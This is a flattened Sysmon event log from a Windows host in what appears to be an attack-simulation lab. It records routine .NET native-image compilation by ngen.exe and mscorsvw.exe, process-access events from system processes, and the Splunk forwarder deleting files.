21:01:47.025{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13B-60D3-B602-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:48.993{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3414AE5086D6446D59DBDDFE3FCD075F,SHA256=E72793776B89A96EFBD50020BD07B87F33347D914765243438B873EF2E8548CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:48.025{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=604AC0A4F1B2AC6E3491DEB81405689A,SHA256=36CAB552AAF7F8ADF3EF34FE3A13720EBA57366EBE5C6729AAAD92912F0056DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.993{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=146CF8B5EF679AA7B3A16920D0EC89F1,SHA256=DF89DB19384212C4560D9AF96ADDFDCE41571306F10E6FD899DDF339CDA9DB05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13D-60D3-BA02-00000000CF01}6584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.962{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13D-60D3-BA02-00000000CF01}6584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.962{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13D-60D3-BA02-00000000CF01}6584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.915{4DB9351A-A13D-60D3-B902-00000000CF01}2580NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUMQKUGBZ0\System.Web.RegularExpressions.ni.dll.auxMD5=6D25FFF148E58B1C53D70FC69B5EFC03,SHA256=D092EE4968BB6655A4510984C3519BA20A5569576971D3E089EA7C5A4BB55038,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.915{4DB9351A-A13D-60D3-B902-00000000CF01}2580NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUMQKUGBZ0\System.Web.RegularExpressions.ni.dllMD5=D6A39AF2473D520CC5245039E8BE0D4F,SHA256=39175B67801F1BF908C7A17F59DA9283F7EE011A5C9D516C977AEAA9F7AF133C,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:49.884{4DB9351A-A13D-60D3-B902-00000000CF01}2580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a14-0\System.Web.RegularExpressions.dll2021-06-23 21:01:49.884 10341000x800000000000000019227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.618{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13D-60D3-B902-00000000CF01}2580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.603{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13D-60D3-B902-00000000CF01}2580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.603{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13D-60D3-B902-00000000CF01}2580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.493{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13D-60D3-B802-00000000CF01}6936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.462{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13D-60D3-B802-00000000CF01}6936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.462{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13D-60D3-B802-00000000CF01}6936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.368{4DB9351A-A13B-60D3-B702-00000000CF01}5332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SLEL337AV3\System.Web.Mobile.ni.dll.auxMD5=68487768F816BFE51BCA07EDE4CA35A2,SHA256=643CE2C5A50097DE0A83C14AADE465C4A91DABA5842D2DB9223198EF4084F053,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.353{4DB9351A-A13B-60D3-B702-00000000CF01}5332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SLEL337AV3\System.Web.Mobile.ni.dllMD5=898E41E20ECA08304316809E65D3C8A5,SHA256=640EB6DD0E28C9DF72AEACCC55C934402BDD12705981D8A967D6B3A0DB369103,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:49.290{4DB9351A-A13B-60D3-B702-00000000CF01}5332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\14d4-0\System.Web.Mobile.dll2021-06-23 21:01:49.290 23542300x800000000000000019247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.467{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FE5BA6F8D44F4406FE38C2AC9D5E9A8,SHA256=CA8AA94931A2C17DB94AB064543D1B48F2B479FA1B9ADED41A10FE70BEE8690E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13E-60D3-BD02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13E-60D3-BD02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.311{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13E-60D3-BD02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13E-60D3-BC02-00000000CF01}1100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13E-60D3-BC02-00000000CF01}1100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.170{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13E-60D3-BC02-00000000CF01}1100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.123{4DB9351A-A13E-60D3-BB02-00000000CF01}6804NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TZ4VBGPN69\System.Web.Routing.ni.dll.auxMD5=F7421FA0247091CC0A59AA190EFB608E,SHA256=274EA93534F212080D2787844DC889D1FF8840892D1ADEEBE217AA8635705D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.123{4DB9351A-A13E-60D3-BB02-00000000CF01}6804NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TZ4VBGPN69\System.Web.Routing.ni.dllMD5=449832FC81F1948B6FFC6EE312D813CE,SHA256=8D61A280C3648D667B1A62555F9194460A0E74550951D6C661D103CD85675716,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:50.123{4DB9351A-A13E-60D3-BB02-00000000CF01}6804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a94-0\System.Web.Routing.dll2021-06-23 21:01:50.123 10341000x800000000000000019237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.092{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13E-60D3-BB02-00000000CF01}6804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.077{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13E-60D3-BB02-00000000CF01}6804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.077{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13E-60D3-BB02-00000000CF01}6804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 